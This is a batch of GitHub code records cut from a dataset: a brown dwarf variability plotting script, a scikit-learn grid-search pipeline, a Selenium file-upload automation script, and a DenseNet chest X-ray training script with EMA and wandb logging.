(1.26,0.7),(0.2,0.7),(0.2,2.24)]\n\n verts30 = [(0.18,2.12), (1.26,1.74), (1.26,3), (0.18,3), (0.18,2.12)]\n verts31 = [(-0.18,0.1), (1.8,1.42), (-0.18,1.7), (-0.18,0.1)]\n verts32 = [(-0.18,1.368), (1.8,1.367), (1.8,0.4), (-0.18,0.4),(-0.18,1.368)]\n\n codes_5v = [\n Path.MOVETO,\n Path.LINETO,\n Path.LINETO,\n Path.LINETO,\n Path.LINETO,\n Path.CLOSEPOLY,\n ]\n codes_4v = [\n Path.MOVETO,\n Path.LINETO,\n Path.LINETO,\n Path.LINETO,\n Path.CLOSEPOLY,\n ]\n codes_3v = [\n Path.MOVETO,\n Path.LINETO,\n Path.LINETO,\n Path.CLOSEPOLY,\n ]\n \n path00 = Path(verts00, codes_3v)\n path01 = Path(verts01, codes_4v)\n path02 = Path(verts02, codes_4v)\n path03 = Path(verts03, codes_3v)\n\n path10 = Path(verts10, codes_3v)\n path11 = Path(verts11, codes_4v)\n path12 = Path(verts12, codes_4v)\n path13 = Path(verts13, codes_4v)\n\n path20 = Path(verts20, codes_4v)\n path21 = Path(verts21, codes_4v)\n path22 = Path(verts22, codes_4v)\n path23 = Path(verts23, codes_4v)\n\n path30 = Path(verts30, codes_4v)\n path31 = Path(verts31, codes_3v)\n path32 = Path(verts32, codes_4v)\n\n patch00 = patches.PathPatch(path00, facecolor='gray', lw=1, alpha=0.25)\n patch01 = patches.PathPatch(path01, facecolor='gray', lw=1, alpha=0.25)\n patch02 = patches.PathPatch(path02, facecolor='gray', lw=1, alpha=0.25)\n patch03 = patches.PathPatch(path03, facecolor='gray', lw=1, alpha=0.25)\n\n patch10 = patches.PathPatch(path10, facecolor='gray', lw=1, alpha=0.25)\n patch11 = patches.PathPatch(path11, facecolor='gray', lw=1, alpha=0.25)\n patch12 = patches.PathPatch(path12, facecolor='gray', lw=1, alpha=0.25)\n patch13 = patches.PathPatch(path13, facecolor='gray', lw=1, alpha=0.25)\n\n patch20 = patches.PathPatch(path20, facecolor='gray', lw=1, alpha=0.25)\n patch21 = patches.PathPatch(path21, facecolor='gray', lw=1, alpha=0.25)\n patch22 = patches.PathPatch(path22, facecolor='gray', lw=1, alpha=0.25)\n patch23 = patches.PathPatch(path23, facecolor='gray', lw=1, alpha=0.25)\n\n patch30 = patches.PathPatch(path30, facecolor='gray', lw=1, alpha=0.25)\n patch31 = patches.PathPatch(path31, facecolor='gray', lw=1, alpha=0.25)\n patch32 = patches.PathPatch(path32, facecolor='gray', lw=1, alpha=0.25)\n \n ######################### index-index plot ###########################\n\n fig = plt.figure(figsize=(26.0,24), constrained_layout = True) # Cambiar tamaño proporcionalmente, c/u sería 6 x 4.5\n plt.rcParams['font.family'] = \"DejaVu Sans\" # Tipo de letra general\n plt.rcParams['font.size'] = 28 # Tamaño de letra general\n plt.rc('xtick', direction='in')\n plt.rc('ytick', direction='in')\n \n ax1 = fig.add_subplot(441)\n ax1.set_xlabel('mostH')\n ax1.set_ylabel('less')\n ax1.plot(index_temp_mostH,index_temp_less,marker ='*',markersize=30, color='black',zorder=3)\n ax1.scatter(indices_data['index_mostH'],indices_data['index_less'],marker ='*',zorder=8)\n ax1.set_ylim((index_temp_less -1.5,index_temp_less + 1.5))\n ax1.set_xlim((index_temp_mostH -1,index_temp_mostH + 1))\n ax1.add_patch(patch00)\n\n ax2 = fig.add_subplot(442)\n ax2.set_xlabel('mostJ')\n ax2.set_ylabel('less')\n ax2.plot(index_temp_mostJ,index_temp_less,marker ='*',markersize=30, color='black',zorder=3)\n ax2.scatter(indices_data['index_mostJ'],indices_data['index_less'],marker ='*',zorder=8)\n ax2.set_ylim((index_temp_less -1.5,index_temp_less + 1.5))\n ax2.set_xlim((index_temp_mostJ - 0.2,index_temp_mostJ + 0.2))\n ax2.add_patch(patch01)\n\n ax3 = fig.add_subplot(443)\n ax3.set_xlabel('CH4J')\n ax3.set_ylabel('less')\n ax3.plot(index_temp_CH4J,index_temp_less,marker ='*',markersize=30, color='black',zorder=3)\n ax3.scatter(indices_data['index_CH4J'],indices_data['index_less'],marker ='*',zorder=8)\n ax3.set_ylim((index_temp_less -1.5,index_temp_less + 1.5))\n ax3.set_xlim((index_temp_CH4J -0.7,index_temp_CH4J + 0.7))\n ax3.add_patch(patch02)\n\n ax4 = fig.add_subplot(444)\n ax4.set_xlabel('Jcurve')\n ax4.set_ylabel('less')\n ax4.plot(index_temp_Jcurve,index_temp_less,marker ='*',markersize=30, color='black',zorder=3)\n ax4.scatter(indices_data['index_Jcurve'],indices_data['index_less'],marker ='*',zorder=8)\n ax4.set_xlim((index_temp_Jcurve -1,index_temp_Jcurve + 1))\n ax4.set_ylim((index_temp_less -1.5,index_temp_less + 1.5))\n ax4.add_patch(patch03)\n\n ax5 = fig.add_subplot(445)\n ax5.set_xlabel('Jcurve')\n ax5.set_ylabel('CH4J')\n ax5.plot(index_temp_Jcurve,index_temp_CH4J,marker ='*',markersize=30, color='black',zorder=3)\n ax5.scatter(indices_data['index_Jcurve'],indices_data['index_CH4J'],marker ='*',zorder=8)\n ax5.set_ylim((index_temp_CH4J -0.7,index_temp_CH4J + 0.7))\n ax5.set_xlim((index_temp_Jcurve -1,index_temp_Jcurve + 1))\n ax5.add_patch(patch10)\n\n ax6 = fig.add_subplot(446)\n ax6.set_xlabel('Jcurve')\n ax6.set_ylabel('mostJ')\n ax6.plot(index_temp_Jcurve,index_temp_mostJ,marker ='*',markersize=30, color='black',zorder=3)\n ax6.scatter(indices_data['index_Jcurve'],indices_data['index_mostJ'],marker ='*',zorder=8)\n ax6.set_xlim((index_temp_Jcurve -1,index_temp_Jcurve + 1))\n ax6.set_ylim((index_temp_mostJ - 0.2,index_temp_mostJ + 0.2))\n ax6.add_patch(patch11)\n\n ax7 = fig.add_subplot(447)\n ax7.set_xlabel('Jcurve')\n ax7.set_ylabel('mostH')\n ax7.plot(index_temp_Jcurve,index_temp_mostH,marker ='*',markersize=30, color='black',zorder=3)\n ax7.scatter(indices_data['index_Jcurve'],indices_data['index_mostH'],marker ='*',zorder=8)\n ax7.set_xlim((index_temp_Jcurve -1,index_temp_Jcurve + 1))\n ax7.set_ylim((index_temp_mostH -1,index_temp_mostH + 1))\n ax7.add_patch(patch12)\n\n ax8 = fig.add_subplot(448)\n ax8.set_xlabel('CH4J')\n ax8.set_ylabel('mostH')\n ax8.plot(index_temp_CH4J,index_temp_mostH,marker ='*',markersize=30, color='black',zorder=3)\n ax8.scatter(indices_data['index_CH4J'],indices_data['index_mostH'],marker ='*',zorder=8)\n ax8.set_xlim((index_temp_CH4J -0.7,index_temp_CH4J + 0.7))\n ax8.set_ylim((index_temp_mostH -1,index_temp_mostH + 1))\n ax8.add_patch(patch13)\n\n ax9 = fig.add_subplot(449)\n ax9.set_xlabel('mostJ')\n ax9.set_ylabel('mostH')\n ax9.scatter(indices_data['index_mostJ'],indices_data['index_mostH'],marker ='*',zorder=8)\n ax9.plot(index_temp_mostJ,index_temp_mostH,marker ='*',markersize=30, color='black',zorder=3)\n ax9.set_xlim((index_temp_mostJ - 0.2,index_temp_mostJ + 0.2))\n ax9.set_ylim((index_temp_mostH -1,index_temp_mostH + 1))\n ax9.add_patch(patch20)\n\n ax10 = fig.add_subplot(4,4,10)\n ax10.set_xlabel('CH4J')\n ax10.set_ylabel('mostJ')\n ax10.plot(index_temp_CH4J,index_temp_mostJ,marker ='*',markersize=30, color='black',zorder=3)\n ax10.scatter(indices_data['index_CH4J'],indices_data['index_mostJ'],marker ='*',zorder=8)\n ax10.set_xlim((index_temp_CH4J -0.7,index_temp_CH4J + 0.7))\n ax10.set_ylim((index_temp_mostJ - 0.2,index_temp_mostJ + 0.2))\n ax10.add_patch(patch21)\n\n ax11 = fig.add_subplot(4,4,11)\n ax11.set_xlabel('H2OJ')\n ax11.set_ylabel('mostJ')\n ax11.plot(index_temp_H2OJ,index_temp_mostJ,marker ='*',markersize=30, color='black',zorder=3)\n ax11.scatter(indices_data['index_H2OJ'],indices_data['index_mostJ'],marker ='*',zorder=8)\n ax11.set_xlim((index_temp_H2OJ -0.3,index_temp_H2OJ + 0.3))\n ax11.set_ylim((index_temp_mostJ - 0.2,index_temp_mostJ + 0.2))\n ax11.add_patch(patch22)\n\n ax12 = fig.add_subplot(4,4,12)\n ax12.set_xlabel('H2OJ')\n ax12.set_ylabel('less')\n ax12.plot(index_temp_H2OJ,index_temp_less,marker ='*',markersize=30, color='black',zorder=3)\n ax12.scatter(indices_data['index_H2OJ'],indices_data['index_less'],marker ='*',zorder=8)\n ax12.set_xlim((index_temp_H2OJ -0.3,index_temp_H2OJ + 0.3))\n ax12.set_ylim((index_temp_less -1.5,index_temp_less + 1.5))\n ax12.add_patch(patch23)\n\n ax13 = fig.add_subplot(4,4,13)\n ax13.set_xlabel('H2OJ')\n ax13.set_ylabel('mostH')\n ax13.plot(index_temp_H2OJ,index_temp_mostH,marker ='*',markersize=30, color='black',zorder=3)\n ax13.scatter(indices_data['index_H2OJ'],indices_data['index_mostH'],marker ='*',zorder=8)\n ax13.set_xlim((index_temp_H2OJ -0.3,index_temp_H2OJ + 0.3))\n ax13.set_ylim((index_temp_mostH -1,index_temp_mostH + 1))\n ax13.add_patch(patch30)\n\n ax14 = fig.add_subplot(4,4,14)\n ax14.set_xlabel('CH4J')\n ax14.set_ylabel('H2OJ')\n ax14.plot(index_temp_CH4J,index_temp_H2OJ,marker ='*',markersize=30, color='black',zorder=3)\n ax14.scatter(indices_data['index_CH4J'],indices_data['index_H2OJ'],marker ='*',zorder=8)\n ax14.set_xlim((index_temp_CH4J -0.7,index_temp_CH4J + 0.7))\n ax14.set_ylim((index_temp_H2OJ -0.3,index_temp_H2OJ + 0.3))\n ax14.add_patch(patch31)\n\n ax15 = fig.add_subplot(4,4,15)\n ax15.set_xlabel('H2OJ')\n ax15.set_ylabel('Jcurve')\n ax15.plot(index_temp_H2OJ,index_temp_Jcurve,marker ='*',markersize=30, color='black',zorder=3)\n ax15.scatter(indices_data['index_H2OJ'],indices_data['index_Jcurve'],marker ='*',zorder=8)\n ax15.set_xlim((index_temp_H2OJ -0.3,index_temp_H2OJ + 0.3))\n ax15.set_ylim((index_temp_Jcurve -1,index_temp_Jcurve + 1))\n ax15.add_patch(patch32)\n\n # Save and display the figure\n if save_index_index_plot == 'Yes':\n plt.savefig('index-index-plot.pdf', bbox_inches='tight')\n if save_index_index_plot == 'No':\n plt.show()\n \n ######################### Variable or not? #########################\n \n #Define the point indices in each plot\n \n puntos00_var = []\n puntos01_var = []\n puntos02_var = []\n puntos03_var = []\n puntos10_var = []\n puntos11_var = []\n puntos12_var = []\n puntos13_var = []\n puntos20_var = []\n puntos21_var = []\n puntos22_var = []\n puntos23_var = []\n puntos30_var = []\n puntos31_var = []\n puntos32_var = []\n \n for i in indices_data.index:\n puntos00_var.append([indices_data['index_mostH'], indices_data['index_less']])\n puntos01_var.append([indices_data['index_mostJ'], indices_data['index_less']])\n puntos02_var.append([indices_data['index_CH4J'], indices_data['index_less']])\n puntos03_var.append([indices_data['index_Jcurve'], indices_data['index_less']])\n puntos10_var.append([indices_data['index_Jcurve'], indices_data['index_CH4J']])\n puntos11_var.append([indices_data['index_Jcurve'], indices_data['index_mostJ']])\n puntos12_var.append([indices_data['index_Jcurve'], indices_data['index_mostH']])\n puntos13_var.append([indices_data['index_CH4J'], indices_data['index_mostH']])\n puntos20_var.append([indices_data['index_mostJ'], indices_data['index_mostH']])\n puntos21_var.append([indices_data['index_CH4J'], indices_data['index_mostJ']])\n puntos22_var.append([indices_data['index_H2OJ'], indices_data['index_mostJ']])\n puntos23_var.append([indices_data['index_H2OJ'], indices_data['index_less']])\n puntos30_var.append([indices_data['index_H2OJ'],indices_data['index_mostH']])\n puntos31_var.append([indices_data['index_CH4J'],indices_data['index_H2OJ']])\n puntos32_var.append([indices_data['index_H2OJ'], indices_data['index_Jcurve']])\n \n #Determine the point indices inside the variability areas in each plot\n inside00_var = path00.contains_points(puntos00_var)\n inside01_var = path01.contains_points(puntos01_var)\n inside02_var = path02.contains_points(puntos02_var)\n inside03_var = path03.contains_points(puntos03_var)\n inside10_var = path10.contains_points(puntos10_var)\n inside11_var = path11.contains_points(puntos11_var)\n inside12_var = path12.contains_points(puntos12_var)\n inside13_var = path13.contains_points(puntos13_var)\n inside20_var = path20.contains_points(puntos20_var)\n inside21_var = path21.contains_points(puntos21_var)\n inside22_var = path22.contains_points(puntos22_var)\n inside23_var = path23.contains_points(puntos23_var)\n inside30_var = path30.contains_points(puntos30_var)\n inside31_var = path31.contains_points(puntos31_var)\n inside32_var = path32.contains_points(puntos32_var)\n \n cant_plots_var = []\n for i in range(0,len(indices_data)):\n cant_plots_var.append(sum([inside00_var[i],inside01_var[i],inside02_var[i],inside03_var[i], inside10_var[i],\n inside11_var[i],inside12_var[i],inside13_var[i],inside20_var[i],inside21_var[i],\n inside22_var[i],inside23_var[i]]))\n #pass threshold? 9\n print('{}{}{}'.format('Your brown dwarf fall in ',cant_plots_var[0],' variable areas of 15'))\n if cant_plots_var[0] > 8:\n a = print('Your brown dwarf is candidate variable')\n else:\n a = print('Your brown dwarf is candidate non-variable')\n return a , cant_plots_var[0] \n\nif spt == 'T':\n TdwarfIndices(indices_data)\nif spt == 'L':\n LdwarfIndices(indices_data)\n\n","repo_name":"ntlucia/BrownDwarf-SpectralIndices","sub_path":"LTdwarfIndices_Set-indices.py","file_name":"LTdwarfIndices_Set-indices.py","file_ext":"py","file_size_in_byte":30959,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"3736303563","text":"import os \n#import json\nimport numpy as np\nimport pandas as pd\nimport dill as pickle\n\nfrom sklearn.externals import joblib\nfrom sklearn.model_selection import train_test_split, GridSearchCV\nfrom sklearn.feature_selection import SelectFromModel\nfrom sklearn.base import BaseEstimator, TransformerMixin\nfrom sklearn.pipeline import make_pipeline\n\nfrom sklearn.ensemble import RandomForestClassifier, RandomForestRegressor\nfrom sklearn.linear_model import LogisticRegression\n\nfrom models.gridCV.preprocess import PreProcessing\nfrom models.gridCV.feat_engineering import FeatEngineering\nfrom models.gridCV.feat_selection import FeatSelection\nfrom models.gridCV.matrix_transform import MatrixTransform\n\nimport warnings\nwarnings.filterwarnings(\"ignore\")\n\n\ndef ml_pipeline(train, target, ml_type):\n\n\t# 1. Define X, y and split\n\tX = [x for x in train.columns if x != target]\n\tX_train, X_test, y_train, y_test = train_test_split(train[X], train[target], test_size=0.5, random_state=42)\n\tprint(\"Shape: \", X_train.shape, X_test.shape, y_train.shape, y_test.shape)\n\ty_train = y_train.reset_index(drop=False)\n\n\tfor col in X_train.columns:\n\t\tif col in [\"PassengerId\", \"index\", \"Unnamed: 0\"]:\n\t\t\tX_train.drop(col, axis=1, inplace=True)\n\n\t# 2. Set pipeline\n\n\tif ml_type == \"Classifier\":\n\t\tpipe = make_pipeline(PreProcessing(),\n\t\t\t\t\t\t\t FeatEngineering(),\n\t\t\t\t\t\t\t FeatSelection(),\n\t\t\t\t\t\t\t MatrixTransform(),\n\t\t\t\t\t\t\t RandomForestClassifier())\n\n\t\tparam_grid = {\"randomforestclassifier__n_estimators\" : [10, 20, 30],\n\t\t\t\t\t \"randomforestclassifier__max_depth\" : [None, 6, 8, 10],\n\t\t\t\t\t \"randomforestclassifier__max_leaf_nodes\": [None, 5, 10, 20], \n\t\t\t\t\t \"randomforestclassifier__min_impurity_split\": [0.1, 0.2, 0.3]}\n\n\t\tgrid = GridSearchCV(pipe, param_grid=param_grid, cv=3)\n\t\tgrid.fit(X_train, y_train[target].as_matrix())\n\t\treturn(grid)\n\n\telif ml_type == \"Regressor\":\n\t\tprint(\"Regressor method\")\n\t\tpipe = make_pipeline(PreProcessing(),\n\t\t\t\t\t\t\t FeatEngineering(),\n\t\t\t\t\t\t\t FeatSelection(),\n\t\t\t\t\t\t\t MatrixTransform(),\n\t\t\t\t\t\t\t RandomForestRegressor())\n\n\t\tparam_grid = {\"randomforestregressor__n_estimators\": [10, 50],\n\t\t\t\t\t \"randomforestregressor__max_depth\": [None, 5],\n\t\t\t\t\t \"randomforestregressor__max_features\": [5, 10],\n\t\t\t\t\t \"randomforestregressor__min_samples_split\": [5, 10],\n\t\t\t\t\t \"randomforestregressor__min_samples_leaf\": [3, 10],\n\t\t\t\t\t \"randomforestregressor__bootstrap\": [True, False]}\n\n\t\tgrid = GridSearchCV(pipe, param_grid=param_grid, cv=3)\n\t\tgrid.fit(X_train, y_train[target].as_matrix())\n\t\treturn(grid)\n\n\telif ml_type == \"LogisticRegression\":\n\t\tpipe = make_pipeline(PreProcessing(),\n\t\t\t\t\t\t\t FeatEngineering(),\n\t\t\t\t\t\t\t FeatSelection(),\n\t\t\t\t\t\t\t MatrixTransform(),\n\t\t\t\t\t\t\t LogisticRegression())\n\n\t\tprint(\"SHAPE: \",X_train.shape, y_train[target].shape)\n\t\tpipe.fit(X_train, y_train[target].as_matrix())\n\t\treturn(pipe)\n\n\n\telif ml_type == \"Features\":\n\t\tPreProcessingInst = PreProcessing()\n\t\tFeatEngineeringInst = FeatEngineering()\n\t\tFeatSelectionInst = FeatSelection()\n\n\t\tX_train = PreProcessingInst.transform(df = X_train)\n\t\tX_train = FeatEngineeringInst.transform(df = X_train)\n\t\tX_train = FeatSelectionInst.transform(df = X_train)\n\n\t\tprint(\"Downloaded features data.\")\n\t\ty_train = y_train[target].to_frame()\n\t\tdf_feat = X_train.merge(y_train, left_index=True, right_index=True, how=\"inner\")\n\t\treturn df_feat\n\t\n\telse:\n\t\tprint(\"Warning: ml_type error\")\n\t\treturn None","repo_name":"pedrocarvalhodev/skyde","sub_path":"models/gridCV/model_pipeline.py","file_name":"model_pipeline.py","file_ext":"py","file_size_in_byte":3363,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"48"} +{"seq_id":"35690310472","text":"\nfrom selenium import webdriver\n\nimport time\n\ndriver = webdriver.Chrome(r\"d:\\tools\\webdrivers\\chromedriver.exe\")\ndriver.implicitly_wait(10)\n\n\n\n\n#先到目标页面\ndriver.get('https://tinypng.com/')\n\n#触发文件选择框\ndriver.find_element_by_css_selector('.icon').click_element()\ntime.sleep(3)#等待文件选择框弹出\n\n#导入win32com 通常windows版本的Python都自带\nimport win32com.client\n#构造shell对象,固定用法,建议直接复制\nshell=win32com.client.Dispatch(\"WScript.Shell\")\n#调用Sendkeys方法,方法原理相当于闭眼睛敲键盘\n#需要默认输入法设置成英文\nshell.Sendkeys(r\"d:\\baidu.png\"+'\\n')#需注意回车符需要有转义效果\n\n\n\n\n\n\n\n\n\n\n# driver.find_element_by_css_selector('.icon').click()\n# time.sleep(2)\n# # 直接发送键盘消息给 当前应用程序,\n# # 前提是浏览器必须是当前应用\n# # pip install pypiwin32\n#\n# import win32com.client\n#\n# shell=win32com.client.Dispatch(\"WScript.Shell\")\n#\n# shell.Sendkeys(r'd:\\baidu.png'+'\\n')\n\n\n\n\n\ninput('...')\n\ndriver.quit()","repo_name":"Kylin0827/Selenium_work","sub_path":"lesson06/uploadfile.py","file_name":"uploadfile.py","file_ext":"py","file_size_in_byte":1046,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"42937162395","text":"import os, sys\nfrom pathlib import Path\nfrom torch.autograd import grad\nfrom tqdm import tqdm\nfrom sklearn.metrics import roc_auc_score\nimport torch\nimport numpy as np\nimport torch.nn as nn\nfrom opts import parse_args\nfrom models.densenet import densenet121\nfrom models.loss import NVUMREG\nfrom data.cx14_dataloader_cut import construct_cx14_cut as construct_cx14_loader\nfrom data.cxp_dataloader_cut import construct_cxp_cut as construct_cxp_loader\n\n# from data.openi import construct_loader\nfrom loguru import logger\nimport wandb\nfrom utils import *\nfrom eval_openi import test_openi\nfrom eval_pdc import test_pc\n\n# from eval_grad import get_grad\n\nBRED = color.BOLD + color.RED\nnih_stored_trim_list = \"epoch,Atelectasis,Cardiomegaly,Effusion,Infiltration,Mass,Nodule,Pneumonia,Pneumothorax,Edema,Emphysema,Fibrosis,Pleural_Thickening,Hernia,Mean\\n\"\n\n\ndef linear_rampup(current, rampup_length=10):\n current = np.clip((current) / rampup_length, 0.0, 1.0)\n return float(current)\n\n\ndef config_wandb(args):\n EXP_NAME = args.exp_name\n os.environ[\"WANDB_MODE\"] = args.wandb_mode\n # os.environ[\"WANDB_SILENT\"] = \"true\"\n wandb.init(project=EXP_NAME)\n wandb.run.name = args.run_name\n # wandb.run.dir = os.path.join(args.save_dir, args.run_name)\n config = wandb.config\n config.update(args)\n logger.bind(stage=\"CONFIG\").critical(\"WANDB_MODE = {}\".format(args.wandb_mode))\n logger.bind(stage=\"CONFIG\").info(\"Experiment Name: {}\".format(EXP_NAME))\n\n\ndef load_args():\n args = parse_args()\n return args\n\n\ndef log_init(args):\n log_base = os.path.join(args.save_dir, args.run_name)\n\n ck_log = os.path.join(log_base, \"cks\")\n Path(ck_log).mkdir(parents=True, exist_ok=True)\n\n grad_log = os.path.join(log_base, \"grads\")\n Path(grad_log).mkdir(parents=True, exist_ok=True)\n\n best_ck_log = os.path.join(log_base, \"model_best.pth\")\n info_log = os.path.join(log_base, \"info.log\")\n open(info_log, \"a\")\n logger.add(info_log, enqueue=True)\n\n train_csv = os.path.join(log_base, f\"pred_{args.train_data}.csv\")\n with open(train_csv, \"a\") as f:\n if args.trim_data:\n f.write(nih_stored_trim_list)\n\n openi_csv = os.path.join(log_base, \"pred_openi.csv\")\n with open(openi_csv, \"a\") as f:\n if args.trim_data:\n f.write(nih_stored_trim_list)\n\n pd_csv = os.path.join(log_base, \"pred_padchest.csv\")\n with open(pd_csv, \"a\") as f:\n if args.trim_data:\n f.write(nih_stored_trim_list)\n\n return {\n \"cks\": ck_log,\n \"info\": info_log,\n \"train_csv\": train_csv,\n \"openi_csv\": openi_csv,\n \"pd_csv\": pd_csv,\n \"best_ck\": best_ck_log,\n \"grad\": grad_log,\n }\n\n\ndef main():\n BEST_AUC = -np.inf\n global args\n args = load_args()\n log_pack = log_init(args)\n config_wandb(args)\n\n model1, model1_ema = create_model_ema(densenet121, args.num_classes, args.device)\n optim1, optim1_ema = create_optimizer_ema(model1, model1_ema, args)\n\n wandb.watch(model1, log=\"all\")\n\n loader_construct = (\n construct_cx14_loader if args.train_data == \"NIH\" else construct_cxp_loader\n )\n train_loader, train_label_distribution = loader_construct(\n args, args.train_root_dir, \"train\"\n )\n test_loader, test_label_distribution = loader_construct(\n args, args.train_root_dir, \"test\"\n )\n # if args.eval_grad:\n # influence_loader, _ = loader_construct(args, args.train_root_dir, \"influence\")\n\n if args.train_data == \"NIH\":\n clean_test_loader, _ = loader_construct(args, args.train_root_dir, \"clean_test\")\n\n scaler = torch.cuda.amp.GradScaler(enabled=True)\n # criterion = nn.MultiLabelSoftMarginLoss().to(args.device)\n criterion1 = NVUMREG(\n len(train_loader.dataset),\n num_classes=args.num_classes,\n device=args.device,\n beta=args.reg_update_beta,\n prior=train_label_distribution,\n )\n logger.bind(stage=\"TRAIN\").info(\"Start Training\")\n lr = args.lr\n # test_openi(args, model=model1_ema, model2=model2_ema if args.use_ensemble else None)\n for epoch in range(args.total_epochs):\n if epoch == (0.7 * args.total_epochs) or epoch == (0.9 * args.total_epochs):\n lr *= 0.1\n for param in optim1.param_groups:\n param[\"lr\"] = lr\n train_loss1 = train(\n scaler,\n args,\n epoch,\n criterion1,\n model1,\n model1_ema,\n optim1,\n optim1_ema,\n train_loader,\n args.device,\n )\n train_loss = train_loss1\n all_auc, test_loss = test(\n model1_ema,\n test_loader,\n args.num_classes,\n args.device,\n )\n\n mean_auc = np.asarray(all_auc).mean()\n\n log_csv(epoch, all_auc, mean_auc, log_pack[\"train_csv\"])\n\n wandb.log(\n {\n f\"Test Loss {args.train_data}\": test_loss,\n f\"MeanAUC_14c {args.train_data}\": mean_auc,\n \"epoch\": epoch,\n }\n )\n\n logger.bind(stage=\"EVAL\").success(\n f\"Epoch {epoch:04d} Train Loss {train_loss:0.4f} Test Loss {test_loss:0.4f} Mean AUC {mean_auc:0.4f}\"\n )\n\n if args.train_data == \"NIH\":\n all_auc, test_loss = test(\n model1_ema,\n clean_test_loader,\n args.num_classes,\n args.device,\n clean_test=True,\n )\n wandb.log(\n {\n f\"Clean Test Loss {args.train_data}\": test_loss,\n \"Pneu\": all_auc[0],\n \"Nodule\": all_auc[2],\n \"Mass\": all_auc[1],\n \"epoch\": epoch,\n }\n )\n\n logger.bind(stage=\"EVAL\").success(\n f\"Epoch {epoch:04d} Train Loss {train_loss:0.4f} Test Loss {test_loss:0.4f} Pneu AUC {all_auc[0]:0.4f} Nodule AUC {all_auc[2]:0.4f} Mass AUC {all_auc[1]:0.4f}\"\n )\n\n # OPI\n openi_all_auc, openi_mean_auc = test_openi(args, model1_ema, model2=None)\n log_csv(epoch, openi_all_auc, openi_mean_auc, log_pack[\"openi_csv\"])\n\n # PDC\n pd_all_auc, pd_mean_auc = test_pc(args, model1_ema, model2=None)\n log_csv(epoch, pd_all_auc, pd_mean_auc, log_pack[\"pd_csv\"])\n\n if mean_auc > BEST_AUC:\n BEST_AUC = mean_auc\n state_dict = {\n \"net1\": model1.state_dict(),\n \"optimizer1\": optim1.state_dict(),\n \"net1_ema\": model1_ema.state_dict(),\n \"elt1\": criterion1.pred_hist,\n \"epoch\": epoch,\n \"mean_auc\": mean_auc,\n \"all_auc\": np.asarray(all_auc),\n }\n save_checkpoint(state_dict, epoch, log_pack[\"best_ck\"], is_best=True)\n save_checkpoint(state_dict, epoch, log_pack[\"cks\"])\n\n\ndef train(\n scaler,\n args,\n epoch,\n criterion,\n net,\n net_ema,\n optimizer,\n optimizer_ema,\n train_loader,\n device,\n):\n net.train()\n net_ema.train()\n total_loss = 0.0\n with tqdm(train_loader, desc=\"Train\", ncols=100) as tl:\n for batch_idx, (inputs, labels, item) in enumerate(tl):\n inputs, labels = inputs.to(device), labels.to(device)\n optimizer.zero_grad()\n\n lam = np.random.beta(1.0, 1.0)\n lam = max(lam, 1 - lam)\n mix_index = torch.randperm(inputs.shape[0]).to(device)\n\n with torch.cuda.amp.autocast(enabled=True):\n outputs = net(inputs)\n outputs_ema = net_ema(inputs).detach()\n\n criterion.update_hist(\n epoch,\n outputs_ema,\n labels.float(),\n item.numpy().tolist(),\n mix_index=mix_index,\n mixup_l=lam,\n )\n\n bce_loss, reg = criterion(outputs, labels)\n final_loss = torch.mean(bce_loss + args.reg_weight * reg)\n total_loss += final_loss.item()\n tl.set_description_str(\n desc=BRED\n + f\"BCE {bce_loss.mean().item():0.4f} Reg {reg.mean().item():.4f} Final {final_loss.item():.4f}\"\n + color.END\n )\n scaler.scale(final_loss).backward()\n scaler.step(optimizer)\n scaler.update()\n\n optimizer_ema.step()\n lr_value = optimizer.param_groups[0][\"lr\"]\n wandb.log(\n {\n \"MultiLabelSoftMarginLoss\": bce_loss.mean().item(),\n \"Reg\": reg.mean().item(),\n }\n )\n # break\n\n return total_loss / (batch_idx + 1)\n\n\ndef test(net, test_loader, num_classes, device, net2=None, clean_test=False):\n logger.bind(stage=\"EVAL\").info(\"************** EVAL ON NIH **************\")\n net.eval()\n all_preds = torch.FloatTensor([]).to(device)\n all_gts = torch.FloatTensor([]).to(device)\n total_loss = 0.0\n for batch_idx, (inputs, labels, item) in enumerate(\n tqdm(test_loader, desc=\"Test \", ncols=100)\n ):\n with torch.no_grad():\n inputs, labels = inputs.to(device), labels.to(device)\n\n outputs1 = net(inputs)\n outputs = outputs1\n\n loss = nn.BCEWithLogitsLoss()(outputs, labels)\n total_loss += loss.item()\n preds = torch.sigmoid(outputs)\n\n all_preds = torch.cat((all_preds, preds), dim=0)\n all_gts = torch.cat((all_gts, labels), dim=0)\n\n all_preds = all_preds.cpu().numpy()\n all_gts = all_gts.cpu().numpy()\n if clean_test:\n all_auc = list()\n all_auc.append(roc_auc_score(all_gts[:, 7], all_preds[:, 7]))\n all_auc.append(roc_auc_score(all_gts[:, 4], all_preds[:, 4]))\n all_auc.append(roc_auc_score(all_gts[:, 5], all_preds[:, 5]))\n else:\n all_auc = [\n roc_auc_score(all_gts[:, i], all_preds[:, i])\n for i in range(num_classes - 1)\n ]\n\n return all_auc, total_loss / (batch_idx + 1)\n\n\ndef create_model_ema(arch, num_classes, device):\n model = arch(pretrained=True)\n model.classifier = nn.Linear(1024, num_classes)\n\n model_ema = arch(pretrained=True)\n # model_ema.classifier = nn.Linear(1024, num_classes)\n model_ema.classifier = nn.Linear(1024, num_classes)\n for param in model_ema.parameters():\n param.detach_()\n\n return model.to(device), model_ema.to(device)\n\n\ndef create_optimizer_ema(model, model_ema, args):\n optim = torch.optim.Adam(\n list(filter(lambda p: p.requires_grad, model.parameters())),\n lr=args.lr,\n betas=(0.9, 0.99),\n eps=0.1,\n )\n optim_ema = WeightEMA(model, model_ema)\n for param in model_ema.parameters():\n param.detach_()\n\n return optim, optim_ema\n\n\nclass WeightEMA(object):\n def __init__(self, model, ema_model, alpha=0.99):\n self.model = model\n self.ema_model = ema_model\n self.alpha = alpha\n # self.params = model.module.state_dict()\n # self.ema_params = ema_model.module.state_dict()\n self.params = model.state_dict()\n self.ema_params = ema_model.state_dict()\n # self.wd = 0.02 * args.lr\n\n for (k, param), (ema_k, ema_param) in zip(\n self.params.items(), self.ema_params.items()\n ):\n ema_param.data.copy_(param.data)\n\n def step(self):\n one_minus_alpha = 1.0 - self.alpha\n for (k, param), (ema_k, ema_param) in zip(\n self.params.items(), self.ema_params.items()\n ):\n if param.type() == \"torch.cuda.LongTensor\":\n ema_param = param\n else:\n # if \"num_batches_tracked\" in k:\n # ema_param.copy_(param)\n 